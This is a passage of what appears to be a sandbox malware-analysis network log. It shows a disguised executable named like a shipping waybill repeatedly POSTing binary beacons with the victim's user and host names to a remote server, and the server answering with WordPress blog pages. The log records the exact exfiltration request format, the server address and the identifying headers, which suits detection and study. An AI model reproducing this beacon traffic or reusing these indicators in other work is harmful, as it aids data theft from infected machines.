                                              Apr 25, 2024 09:43:21.332911968 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:21.333028078 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:21.333203077 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:21.333631992 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:21.333915949 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.2.44981545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:21.643851042 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:21.769915104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:22.610361099 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:21 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:22.610389948 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:22.610519886 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 25, 2024 09:43:22.610589027 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:22.619410992 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:22.619698048 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:22.619725943 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:22.619741917 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:22.619894028 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:22.619910955 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              66192.168.2.44981645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:22.887850046 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:23.019001007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:23.840818882 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:22 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:23.840920925 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:23.849293947 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:23.849658966 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:23.849827051 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:23.849854946 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:23.849951982 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:23.850003004 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:23.850039959 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:23.850155115 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a
                                              Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.2.44981745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:24.107779980 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:24.240031958 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:25.077003002 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:24 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:25.077562094 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:25.077693939 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:25.087455988 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:25.087805033 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:25.087986946 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:25.088088989 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:25.088255882 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:25.088293076 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:25.088403940 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.2.44981845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:25.348509073 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:25.481884956 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:26.456254959 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:25 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:26.456276894 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:26.456341028 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:26.468352079 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:26.468800068 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:26.468929052 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:26.468976021 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:26.469103098 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:26.469127893 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:26.469144106 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.2.44981945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:26.739379883 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:26.869136095 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
